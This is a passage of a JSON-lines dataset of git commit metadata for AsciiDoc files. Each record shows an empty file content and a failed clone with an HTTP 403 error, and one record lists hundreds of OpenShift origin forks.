2018-11-27-Laravel-Nexmo-S-M-S.adoc","message":"Update 2018-11-27-Laravel-Nexmo-S-M-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-27-Laravel-Nexmo-S-M-S.adoc","new_file":"_posts\/2018-11-27-Laravel-Nexmo-S-M-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"11e8613b8aed7e22c68ccd678688097614110b42","subject":"Publish 1993-11-17.adoc","message":"Publish 1993-11-17.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"1993-11-17.adoc","new_file":"1993-11-17.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"45e6d13191f2d334132aa19c11511778a97eff87","subject":"Publish 2016-09-09.adoc","message":"Publish 2016-09-09.adoc","repos":"bitcowboy\/bitcowboy.github.io,bitcowboy\/bitcowboy.github.io,bitcowboy\/bitcowboy.github.io,bitcowboy\/bitcowboy.github.io","old_file":"2016-09-09.adoc","new_file":"2016-09-09.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bitcowboy\/bitcowboy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"21ac18263fc01047ba1f99a38c13e13ab36bcf7f","subject":"Update 2013-10-13-Neo4j-mais-quest-ce-aue-cest.adoc","message":"Update 2013-10-13-Neo4j-mais-quest-ce-aue-cest.adoc","repos":"fbiville\/fbiville.github.io,fbiville\/fbiville.github.io,fbiville\/fbiville.github.io,fbiville\/fbiville.github.io","old_file":"_posts\/2013-10-13-Neo4j-mais-quest-ce-aue-cest.adoc","new_file":"_posts\/2013-10-13-Neo4j-mais-quest-ce-aue-cest.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fbiville\/fbiville.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4713f84eea671aee04f7b4f28a2b14157a227a14","subject":"Update 2016-02-18-The-Wild-Success-of-XProc-v1.adoc","message":"Update 2016-02-18-The-Wild-Success-of-XProc-v1.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-02-18-The-Wild-Success-of-XProc-v1.adoc","new_file":"_posts\/2016-02-18-The-Wild-Success-of-XProc-v1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b4b632854e139d1602ec53dbd43f26806e63746e","subject":"Add reference to other platforms","message":"Add reference to other platforms","repos":"maleck13\/origin,dcrisan\/origin,levivic\/origin,rhuss\/origin,adelton\/origin,domenicbove\/origin,christian-posta\/origin,chlunde\/origin,rajkotecha\/origin,tjanez\/origin,ibotty\/origin,ocsbrandon\/origin,gruiz17\/origin,ironcladlou\/origin,jwforres\/origin,raffaelespazzoli\/origin,aweiteka\/origin,marun\/origin,gabemontero\/origin,elyscape\/origin,dinhxuanvu\/origin,jhadvig\/origin,janetkuo\/origin,nak3\/origin,xiuwang\/origin,elyscape\/origin,nak3\/origin,mdshuai\/origin,marun\/origin,biyiklioglu\/origin,lixueclaire\/origin,greyfairer\/openshift-origin,soltysh\/origin,pweil-\/origin,Tlacenka\/origin,imcsk8\/origin,fkirill\/origin,rchicoli\/openshift-origin,markllama\/origin,chlunde\/origin,lorenzogm\/openshift-origin,tnozicka\/origin,pravisankar\/origin,benjaminapetersen\/origin,danwinship\/origin,linzhaoming\/origin,cgwalters\/origin,linux-on-ibm-z\/origin,pgmcd\/origin,tdawson\/origin,gruiz17\/origin,mdshuai\/origin,robertol\/origin,projectatomic\/atomic-enterprise,arilivigni\/origin,xuant\/origin,y0no\/origin,tnozicka\/origin,ashcrow\/origin,aweiteka\/origin,marun\/origin,burmanm\/origin,jhammant\/origin,ibotty\/origin,jeffvance\/origin,janetkuo\/origin,markllama\/origin,spohnan\/origin,moolitayer\/origin,ocsbrandon\/origin,y0no\/origin,samsong8610\/origin,Tlacenka\/origin,simo5\/origin,danwinship\/origin,pmorie\/origin,PI-Victor\/origin,joshuawilson\/origin,markllama\/origin,stevekuznetsov\/origin,enj\/origin,ocsbrandon\/origin,bowenha2\/origin,tjanez\/origin,yepengxj\/df,rusenask\/origin,aweiteka\/origin,childsb\/origin,bparees\/origin,pgmcd\/origin,ravisantoshgudimetla\/origin,sosiouxme\/origin,adelton\/origin,adelton\/origin,jwhonce\/origin,ramr\/origin,hferentschik\/origin,fkirill\/origin,liangxia\/origin,sg00dwin\/origin,eparis\/origin,tjcunliffe\/origin,janetkuo\/origin,tagoh\/origin,rrati\/origin,chmouel\/origin,christian-posta\/origin,benjaminapetersen\/origin,thrasher-redhat\/origin,kargakis\/origin,jprukner\/origin,lorenzogm\/openshift-origin,y0no\/origin,robertol\/origin,pombredanne\/atomic-enterprise,liggitt\/origin,yepengxj\/df,wyue-redhat\/origin,PI-Victor\/origin,pacoja84\/origin,ibotty\/origin,domenicbove\/origin,pkdevbox\/origin,goern\/origin,dustintownsend\/origin,ejemba\/origin,jeffvance\/origin,dcrisan\/origin,greyfairer\/openshift-origin,benjaminapetersen\/origin,codificat\/origin,yepengxj\/df,lixueclaire\/origin,linearregression\/origin,willmtemple\/origin,dobbymoodge\/origin,westmisfit\/origin,juanvallejo\/origin,projectatomic\/atomic-enterprise,dkorn\/origin,legionus\/origin,gesrat-cisco\/origin,hingstarne\/origin,dmage\/origin,quantiply-fork\/origin,smarterclayton\/origin,bowenha2\/origin,rhuss\/origin,jeffvance\/origin,jdnieto\/origin,maxamillion\/origin,levivic\/origin,zofuthan\/origin,wanghaoran1988\/atomic-enterprise,arilivigni\/origin,romanbartl\/origin,wanghaoran1988\/origin,jpeeler\/origin,projectatomic\/atomic-enterprise,dgoodwin\/origin,quantiply-fork\/origin,spohnan\/origin,EricMountain-1A\/openshift-origin,adietish\/origin,dcbw\/origin,mkumatag\/origin,spadgett\/origin,imcsk8\/origin,jwforres\/origin,smarterclayton\/origin,hingstarne\/origin,hroyrh\/origin,jdnieto\/origin,dobbymoodge\/origin,jpeeler\/origin,Miciah\/origin,rootfs\/origin,nhr\/origin,ryanj\/origin,markllama\/atomic-enterprise,lorenzogm\/openshift-origin,ashcrow\/origin,Nick-Harvey\/origin,rchicoli\/openshift-origin,nhr\/origin,miminar\/origin,nhr\/origin,benjaminapetersen\/origin,quantiply-fork\/origin,jsafrane\/origin,php-coder\/origin,cgwalters\/origin,robertol\/origin,cgwalters\/origin,fkirill\/origin,jprukner\/origin,janetkuo\/origin,burmanm\/origin,rhuss\/origin,craigmunro\/origin,StevenLudwig\/origin,ryanj\/origin,pmorie\/origin,php-coder\/origin,dkorn\/origin,inlandsee\/origin,sjug\/origin,aveshagarwal\/origin,mingderwang\/origin,jprukner\/origin,detiber\/origin,JacobTanenbaum\/origin,rchicoli\/openshift-origin,jeremyeder\/origin,zofuthan\/origin,dkorn\/origin,thesteve0\/origin,Nick-Harvey\/origin,maxamillion\/origin,mfojtik\/origin,projectatomic\/atomic-enterprise,jupierce\/origin,moolitayer\/origin,myfear\/origin,jsafrane\/origin,marsmensch\/atomic-enterprise,sferich888\/origin,asiainfoLDP\/datafactory,knobunc\/origin,chlunde\/origin,danmcp\/origin,mnagy\/origin,danmcp\/origin,chmouel\/origin,stefwalter\/origin,csrwng\/origin,jhammant\/origin,ashcrow\/origin,coreydaley\/origin,nitintutlani\/origin,gesrat-cisco\/origin,chlunde\/origin,spohnan\/origin,maleck13\/origin,PI-Victor\/origin,rhamilto\/origin,romanbartl\/origin,juanvallejo\/origin,YannMoisan\/origin,willmtemple\/origin,mrunalp\/origin,wanghaoran1988\/origin,inlandsee\/origin,mingderwang\/origin,tnguyen-rh\/origin,mnagy\/origin,dustintownsend\/origin,pkdevbox\/origin,nitintutlani\/origin,rrati\/origin,allevo\/origin,maleck13\/origin,mrogers950\/origin,myfear\/origin,tjanez\/origin,pacoja84\/origin,levivic\/origin,nitintutlani\/origin,wanghaoran1988\/origin,quantiply-fork\/origin,simo5\/origin,benjaminapetersen\/origin,tdawson\/origin,pombredanne\/atomic-enterprise,aveshagarwal\/origin,YannMoisan\/origin,mfisher-rht\/origin,legionus\/origin,matthyx\/origin,imcsk8\/origin,Tlacenka\/origin,adietish\/origin,dinhxuanvu\/origin,wjiangjay\/origin,ncdc\/origin,vongalpha\/origin,raffaelespazzoli\/origin,spohnan\/origin,mfojtik\/origin,knobunc\/origin,nitintutlani\/origin,mjisyang\/origin,westmisfit\/origin,bparees\/origin,danmcp\/origin,zhaosijun\/origin,myfear\/origin,ashcrow\/origin,danmcp\/origin,dkorn\/origin,wyue-redhat\/origin,seveillac\/origin,oybed\/origin,hferentschik\/origin,christian-posta\/origin,jeremyeder\/origin,senayar\/origin,mahak\/origin,dcbw\/origin,swizzley\/origin,bowenha2\/origin,sosiouxme\/origin,oybed\/origin,dcrisan\/origin,ravisantoshgudimetla\/origin,simo5\/origin,tiwillia\/origin,liggitt\/origin,eparis\/origin,ocsbrandon\/origin,pravisankar\/origin,ncdc\/origin,enj\/origin,hroyrh\/origin,miminar\/origin,miminar\/origin,abutcher\/origin,pombredanne\/atomic-enterprise,ravisantoshgudimetla\/origin,dobbymoodge\/origin,adietish\/origin,sseago\/origin,rusenask\/origin,miminar\/origin,louyihua\/origin,ocsbrandon\/origin,hferentschik\/origin,rafabene\/origin,rhamilto\/origin,jwhonce\/origin,mingderwang\/origin,stackdocker\/origin,oybed\/origin,luciddreamz\/origin,christian-posta\/origin,fkirill\/origin,rajatchopra\/origin,juanvallejo\/origin,greyfairer\/openshift-origin,ravisantoshgudimetla\/origin,Tlacenka\/origin,lixueclaire\/origin,fabianofranz\/origin,mkumatag\/origin,joshuawilson\/origin,akram\/origin,gruiz17\/origin,dcrisan\/origin,grdryn\/origin,stefwalter\/origin,YannMoisan\/origin,coreydaley\/origin,matthyx\/origin,StevenLudwig\/origin,sdodson\/origin,childsb\/origin,xiuwang\/origin,tjanez\/origin,jhammant\/origin,mrogers950\/origin,liangxia\/origin,robertol\/origin,maleck13\/origin,wyue-redhat\/origin,greyfairer\/openshift-origin,miminar\/atomic-enterprise,jhammant\/origin,biyiklioglu\/origin,swizzley\/origin,ingvagabund\/origin,mfisher-rht\/origin,hingstarne\/origin,ibotty\/origin,gashcrumb\/origin,stackdocker\/origin,allevo\/origin,sseago\/origin,greyfairer\/openshift-origin,tnguyen-rh\/origin,mfisher-rht\/origin,pravisankar\/origin,samsong8610\/origin,EricMountain-1A\/openshift-origin,codificat\/origin,detiber\/origin,mfisher-rht\/origin,deads2k\/origin,tnguyen-rh\/origin,thesteve0\/origin,hroyrh\/origin,smunilla\/origin,ryanj\/origin,rusenask\/origin,jim-minter\/origin,thrasher-redhat\/origin,Jandersolutions\/origin,rootfs\/origin,joshuawilson\/origin,projectatomic\/atomic-enterprise,dcbw\/origin,pmorie\/origin,wanghaoran1988\/atomic-enterprise,senayar\/origin,miminar\/atomic-enterprise,thrasher-redhat\/origin,ironcladlou\/origin,sjug\/origin,kargakis\/origin,vongalpha\/origin,maxamillion\/origin,pmorie\/origin,mrogers950\/origin,rootfs\/origin,kargakis\/origin,mrogers950\/origin,mnagy\/origin,php-coder\/origin,kargakis\/origin,yarko\/origin,miminar\/atomic-enterprise,sspeiche\/origin,wanghaoran1988\/atomic-enterprise,markllama\/origin,imcsk8\/origin,tnozicka\/origin,swizzley\/origin,maxamillion\/origin,StevenLudwig\/origin,luciddreamz\/origin,zhaosijun\/origin,Jandersoft\/origin,imcsk8\/origin,mrogers950\/origin,smunilla\/origin,wanghaoran1988\/atomic-enterprise,rajatchopra\/origin,tdawson\/origin,y0no\/origin,louyihua\/origin,liggitt\/origin,luciddreamz\/origin,EricMountain-1A\/openshift-origin,sferich888\/origin,rhamilto\/origin,EricMountain-1A\/openshift-origin,samsong8610\/origin,nitintutlani\/origin,mjisyang\/origin,dmage\/origin,senayar\/origin,vongalpha\/origin,ravisantoshgudimetla\/origin,matthyx\/origin,dcbw\/origin,yarko\/origin,akram\/origin,louyihua\/origin,liangxia\/origin,csrwng\/origin,kargakis\/origin,tiwillia\/origin,jhadvig\/origin,wanghaoran1988\/atomic-enterprise,gashcrumb\/origin,danwinship\/origin,rootfs\/origin,linearregression\/origin,marun\/origin,detiber\/origin,sdminonne\/origin,Jandersolutions\/origin,pravisankar\/origin,pacoja84\/origin,danwinship\/origin,hferentschik\/origin,lixueclaire\/origin,liggitt\/origin,goern\/origin,mnagy\/origin,spadgett\/origin,allevo\/origin,thrasher-redhat\/origin,Nick-Harvey\/origin,marsmensch\/atomic-enterprise,biyiklioglu\/origin,stevekuznetsov\/origin,spadgett\/origin,rootfs\/origin,sdodson\/origin,jdnieto\/origin,westmisfit\/origin,linearregression\/origin,cgwalters\/origin,tjcunliffe\/origin,tracyrankin\/origin,arilivigni\/origin,rajkotecha\/origin,rajkotecha\/origin,wjiangjay\/origin,oybed\/origin,legionus\/origin,rafabene\/origin,nitintutlani\/origin,liggitt\/origin,jprukner\/origin,rafabene\/origin,ingvagabund\/origin,rrati\/origin,xuant\/origin,chmouel\/origin,mdshuai\/origin,wjiangjay\/origin,moolitayer\/origin,samsong8610\/origin,yarko\/origin,jim-minter\/origin,wyue-redhat\/origin,HyunsooKim1112\/origin,Jandersolutions\/origin,jwhonce\/origin,grdryn\/origin,greyfairer\/openshift-origin,juanvallejo\/origin,legionus\/origin,Jandersolutions\/origin,ramr\/origin,rhuss\/origin,deads2k\/origin,rchicoli\/openshift-origin,aveshagarwal\/origin,asiainfoLDP\/datafactory,fabianofranz\/origin,gruiz17\/origin,pkdevbox\/origin,zofuthan\/origin,abutcher\/origin,swizzley\/origin,tnguyen-rh\/origin,thesteve0\/origin,quantiply-fork\/origin,mingderwang\/origin,smarterclayton\/origin,linux-on-ibm-z\/origin,rafabene\/origin,miminar\/origin,sosiouxme\/origin,Jandersoft\/origin,elyscape\/origin,HyunsooKim1112\/origin,dmage\/origin,YannMoisan\/origin,domenicbove\/origin,mahak\/origin,simo5\/origin,christian-posta\/origin,linzhaoming\/origin,detiber\/origin,childsb\/origin,thesteve0\/origin,anpingli\/origin,moolitayer\/origin,StevenLudwig\/origin,sallyom\/origin,tagoh\/origin,markllama\/atomic-enterprise,jwhonce\/origin,childsb\/origin,adelton\/origin,codificat\/origin,aveshagarwal\/origin,rrati\/origin,levivic\/origin,smunilla\/origin,jhadvig\/origin,liangxia\/origin,Nick-Harvey\/origin,Tlacenka\/origin,vongalpha\/origin,jwforres\/origin,robertol\/origin,tagoh\/origin,pweil-\/origin,zhaosijun\/origin,louyihua\/origin,pombredanne\/atomic-enterprise,dustintownsend\/origin,biyiklioglu\/origin,miminar\/atomic-enterprise,mjisyang\/origin,rajatchopra\/origin,goern\/origin,rusenask\/origin,romanbartl\/origin,spinolacastro\/origin,tagoh\/origin,rhuss\/origin,elyscape\/origin,sgallagher\/origin,ejemba\/origin,adietish\/origin,bowenha2\/origin,tagoh\/origin,sjug\/origin,tiwillia\/origin,jprukner\/origin,tracyrankin\/origin,marsmensch\/atomic-enterprise,luciddreamz\/origin,westmisfit\/origin,spinolacastro\/origin,soltysh\/origin,sdodson\/origin,stackdocker\/origin,projectatomic\/atomic-enterprise,jhadvig\/origin,enj\/origin,rajkotecha\/origin,ramr\/origin,pecameron\/origin,biyiklioglu\/origin,deads2k\/origin,moolitayer\/origin,fkirill\/origin,ironcladlou\/origin,openshift\/origin,Jandersolutions\/origin,mjisyang\/origin,spohnan\/origin,mkumatag\/origin,senayar\/origin,juanvallejo\/origin,joshuawilson\/origin,jdnieto\/origin,jeremyeder\/origin,ncdc\/origin,sgallagher\/origin,samsong8610\/origin,detiber\/origin,tnozicka\/origin,aweiteka\/origin,mnagy\/origin,pacoja84\/origin,rusenask\/origin,mahak\/origin,mfisher-rht\/origin,sspeiche\/origin,eparis\/origin,sseago\/origin,gesrat-cisco\/origin,sgallagher\/origin,lorenzogm\/openshift-origin,fkirill\/origin,PI-Victor\/origin,craigmunro\/origin,inlandsee\/origin,grdryn\/origin,willmtemple\/origin,rajatchopra\/origin,gruiz17\/origin,ramr\/origin,wjiangjay\/origin,pgmcd\/origin,romanbartl\/origin,sg00dwin\/origin,pgmcd\/origin,romanbartl\/origin,jpeeler\/origin,pecameron\/origin,nak3\/origin,moolitayer\/origin,yepengxj\/df,sdodson\/origin,Nick-Harvey\/origin,ramr\/origin,Miciah\/origin,ncdc\/origin,YannMoisan\/origin,tjcunliffe\/origin,ashcrow\/origin,lorenzogm\/openshift-origin,jwforres\/origin,pombredanne\/atomic-enterprise,abutcher\/origin,westmisfit\/origin,nhr\/origin,romanbartl\/origin,hingstarne\/origin,spohnan\/origin,akram\/origin,tnguyen-rh\/origin,linzhaoming\/origin,hingstarne\/origin,barrett-vegas-com\/origin,openshift\/origin,willmtemple\/origin,oybed\/origin,yarko\/origin,y0no\/origin,inlandsee\/origin,dkorn\/origin,smunilla\/origin,liangxia\/origin,janetkuo\/origin,sg00dwin\/origin,ryanj\/origin,miminar\/origin,tnguyen-rh\/origin,mingderwang\/origin,jhadvig\/origin,dinhxuanvu\/origin,marsmensch\/atomic-enterprise,asiainfoLDP\/datafactory,jprukner\/origin,jpeeler\/origin,xuant\/origin,knobunc\/origin,xiuwang\/origin,eparis\/origin,tjcunliffe\/origin,aweiteka\/origin,linzhaoming\/origin,spadgett\/origin,craigmunro\/origin,abutcher\/origin,barrett-vegas-com\/origin,dustintownsend\/origin,myfear\/origin,westmisfit\/origin,rhcarvalho\/origin,ejemba\/origin,anpingli\/origin,rhcarvalho\/origin,rhcarvalho\/origin,allevo\/origin,adietish\/origin,bparees\/origin,jhammant\/origin,pacoja84\/origin,PI-Victor\/origin,mfojtik\/origin,raffaelespazzoli\/origin,legionus\/origin,barrett-vegas-com\/origin,StevenLudwig\/origin,jupierce\/origin,nhr\/origin,rhamilto\/origin,gabemontero\/origin,wjiangjay\/origin,rajkotecha\/origin,danwinship\/origin,liangxia\/origin,myfear\/origin,rajkotecha\/origin,xuant\/origin,sspeiche\/origin,wanghaoran1988\/atomic-enterprise,miminar\/atomic-enterprise,ejemba\/origin,spinolacastro\/origin,wanghaoran1988\/origin,cgwalters\/origin,pmorie\/origin,zofuthan\/origin,rajatchopra\/origin,jwforres\/origin,HyunsooKim1112\/origin,wjiangjay\/origin,jupierce\/origin,luciddreamz\/origin,linux-on-ibm-z\/origin,HyunsooKim1112\/origin,craigmunro\/origin,christian-posta\/origin,elyscape\/origin,dustintownsend\/origin,ryanj\/origin,allevo\/origin,hferentschik\/origin,Miciah\/origin,vongalpha\/origin,burmanm\/origin,EricMountain-1A\/openshift-origin,cgwalters\/origin,gesrat-cisco\/origin,liggitt\/origin,spadgett\/origin,domenicbove\/origin,seveillac\/origin,stefwalter\/origin,ingvagabund\/origin,xuant\/origin,vongalpha\/origin,smunilla\/origin,mdshuai\/origin,jhadvig\/origin,gesrat-cisco\/origin,soltysh\/origin,allevo\/origin,jeremyeder\/origin,seveillac\/origin,jsafrane\/origin,wyue-redhat\/origin,mrunalp\/origin,rafabene\/origin,JacobTanenbaum\/origin,lixueclaire\/origin,jpeeler\/origin,bowenha2\/origin,Jandersoft\/origin,stevekuznetsov\/origin,linearregression\/origin,rajatchopra\/origin,jeremyeder\/origin,YannMoisan\/origin,smarterclayton\/origin,dkorn\/origin,tjanez\/origin,juanvallejo\/origin,linzhaoming\/origin,marsmensch\/atomic-enterprise,tagoh\/origin,marsmensch\/atomic-enterprise,levivic\/origin,spinolacastro\/origin,rhamilto\/origin,pweil-\/origin,hferentschik\/origin,dmage\/origin,mjisyang\/origin,gesrat-cisco\/origin,StevenLudwig\/origin,markllama\/atomic-enterprise,tracyrankin\/origin,stefwalter\/origin,linux-on-ibm-z\/origin,jwhonce\/origin,HyunsooKim1112\/origin,tjcunliffe\/origin,luciddreamz\/origin,jeffvance\/origin,gashcrumb\/origin,sgallagher\/origin,markllama\/atomic-enterprise,ibotty\/origin,lorenzogm\/openshift-origin,jhammant\/origin,openshift\/origin,sdodson\/origin,sspeiche\/origin,ashcrow\/origin,tnozicka\/origin,rrati\/origin,craigmunro\/origin,myfear\/origin,pecameron\/origin,oybed\/origin,pgmcd\/origin,dobbymoodge\/origin,zofuthan\/origin,matthyx\/origin,yarko\/origin,ibotty\/origin,adietish\/origin,barrett-vegas-com\/origin,Jandersoft\/origin,linux-on-ibm-z\/origin,grdryn\/origin,sg00dwin\/origin,seveillac\/origin,dustintownsend\/origin,pkdevbox\/origin,zofuthan\/origin,sferich888\/origin,fabianofranz\/origin,rhcarvalho\/origin,jupierce\/origin,wanghaoran1988\/origin,seveillac\/origin,dcrisan\/origin,smunilla\/origin,barrett-vegas-com\/origin,stefwalter\/origin,aweiteka\/origin,asiainfoLDP\/datafactory,dgoodwin\/origin,ejemba\/origin,HyunsooKim1112\/origin,senayar\/origin,louyihua\/origin,codificat\/origin,burmanm\/origin,senayar\/origin,childsb\/origin,dobbymoodge\/origin,matthyx\/origin,ocsbrandon\/origin,dgoodwin\/origin,simo5\/origin,sdminonne\/origin,danwinship\/origin,xuant\/origin,abutcher\/origin,mfisher-rht\/origin,jwhonce\/origin,pacoja84\/origin,markllama\/atomic-enterprise,markllama\/atomic-enterprise,sallyom\/origin,knobunc\/origin,Jandersoft\/origin,barrett-vegas-com\/origin,mjisyang\/origin,samsong8610\/origin,burmanm\/origin,mdshuai\/origin,Jandersolutions\/origin,mnagy\/origin,rhuss\/origin,php-coder\/origin,levivic\/origin,dinhxuanvu\/origin,gruiz17\/origin,markllama\/origin,imcsk8\/origin,rafabene\/origin,linux-on-ibm-z\/origin,JacobTanenbaum\/origin,aveshagarwal\/origin,childsb\/origin,joshuawilson\/origin,mrogers950\/origin,thesteve0\/origin,fabianofranz\/origin,stackdocker\/origin,craigmunro\/origin,bowenha2\/origin,raffaelespazzoli\/origin,miminar\/atomic-enterprise,sdodson\/origin,jwforres\/origin,mdshuai\/origin,domenicbove\/origin,jim-minter\/origin,adelton\/origin,dgoodwin\/origin,tiwillia\/origin,gabemontero\/origin,chmouel\/origin,biyiklioglu\/origin,pravisankar\/origin,burmanm\/origin,maxamillion\/origin,pkdevbox\/origin,jdnieto\/origin,sdminonne\/origin,grdryn\/origin,swizzley\/origin,coreydaley\/origin,php-coder\/origin,mrunalp\/origin,smarterclayton\/origin,domenicbove\/origin,stackdocker\/origin,stevekuznetsov\/origin,joshuawilson\/origin,sseago\/origin,yarko\/origin,kargakis\/origin,stackdocker\/origin,EricMountain-1A\/openshift-origin,janetkuo\/origin,goern\/origin,tjanez\/origin,rhcarvalho\/origin,hingstarne\/origin,sseago\/origin,pgmcd\/origin,stefwalter\/origin,thesteve0\/origin,arilivigni\/origin,dgoodwin\/origin,gashcrumb\/origin,ejemba\/origin,Jandersoft\/origin,zhaosijun\/origin,benjaminapetersen\/origin,y0no\/origin,tracyrankin\/origin,ryanj\/origin,mingderwang\/origin,PI-Victor\/origin,seveillac\/origin,wyue-redhat\/origin,asiainfoLDP\/datafactory,Tlacenka\/origin,csrwng\/origin,spinolacastro\/origin,dcrisan\/origin,jupierce\/origin,dinhxuanvu\/origin,markllama\/origin,lixueclaire\/origin,asiainfoLDP\/datafactory,sallyom\/origin,pombredanne\/atomic-enterprise,robertol\/origin,sseago\/origin,tnozicka\/origin,dcbw\/origin,anpingli\/origin,Nick-Harvey\/origin,swizzley\/origin,pkdevbox\/origin,jdnieto\/origin,dobbymoodge\/origin,tjcunliffe\/origin,quantiply-fork\/origin,rusenask\/origin,tdawson\/origin,spinolacastro\/origin,grdryn\/origin,php-coder\/origin","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pravisankar\/origin.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7909ba8715f975284740714b2f41524bbf4764e3","subject":"Add project readme.","message":"Add project readme.\n","repos":"jhunovis\/umlaut-search-intellij-plugin","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jhunovis\/umlaut-search-intellij-plugin.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3d9c899cafe326490010a7c82b48cfce52b795fa","subject":"Use master version in upstream master development","message":"Use master version in upstream master development","repos":"objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,lucasponce\/hawkular.github.io,jsanda\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,ppalaga\/hawkular.github.io,pilhuhn\/hawkular.github.io,tsegismont\/hawkular.github.io,ppalaga\/hawkular.github.io,lzoubek\/hawkular.github.io,tsegismont\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,jotak\/hawkular.github.io,jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io,ppalaga\/hawkular.github.io,metlos\/hawkular.github.io,tsegismont\/hawkular.github.io,metlos\/hawkular.github.io,jpkrohling\/hawkular.github.io,jsanda\/hawkular.github.io,metlos\/hawkular.github.io,jpkrohling\/hawkular.github.io,jsanda\/hawkular.github.io,jpkrohling\/hawkular.github.io,hawkular\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,lzoubek\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,pilhuhn\/hawkular.github.io,metlos\/hawkular.github.io,lzoubek\/hawkular.github.io,hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,ppalaga\/hawkular.github.io,objectiser\/hawkular.github.io,jsanda\/hawkular.github.io,lzoubek\/hawkular.github.io,tsegismont\/hawkular.github.io,objectiser\/hawkular.github.io,lucasponce\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/docs\/dev\/development.adoc","new_file":"src\/main\/jbake\/content\/docs\/dev\/development.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"72e017192837ec3612c9d3f051b20a2f9af70edb","subject":"Update 2015-10-11-Restoring-an-old-MS-DOS-game-for-the-future.adoc","message":"Update 2015-10-11-Restoring-an-old-MS-DOS-game-for-the-future.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2015-10-11-Restoring-an-old-MS-DOS-game-for-the-future.adoc","new_file":"_posts\/2015-10-11-Restoring-an-old-MS-DOS-game-for-the-future.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"33639574d62fb72bf7288bff52a959ffe622f63e","subject":"Update 2015-01-31-My-English-Title.adoc","message":"Update 2015-01-31-My-English-Title.adoc","repos":"darkfirenze\/darkfirenze.github.io,darkfirenze\/darkfirenze.github.io,darkfirenze\/darkfirenze.github.io","old_file":"_posts\/2015-01-31-My-English-Title.adoc","new_file":"_posts\/2015-01-31-My-English-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/darkfirenze\/darkfirenze.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8bec3ab563f209d697cd352334c6f641a9537a9f","subject":"Update 2016-01-04-Java-8-in-action.adoc","message":"Update 2016-01-04-Java-8-in-action.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2016-01-04-Java-8-in-action.adoc","new_file":"_posts\/2016-01-04-Java-8-in-action.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1b1dd659d892fd585642558a3433c6c83cc723b7","subject":"Update 2016-11-14-My-English-Title.adoc","message":"Update 2016-11-14-My-English-Title.adoc","repos":"pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io","old_file":"_posts\/2016-11-14-My-English-Title.adoc","new_file":"_posts\/2016-11-14-My-English-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pepite\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f76ff6ae5c4e2f78b08ea4092c0c291ea2a85d7e","subject":"Update 2010-05-16-Le-zoo-est-ouvert.adoc","message":"Update 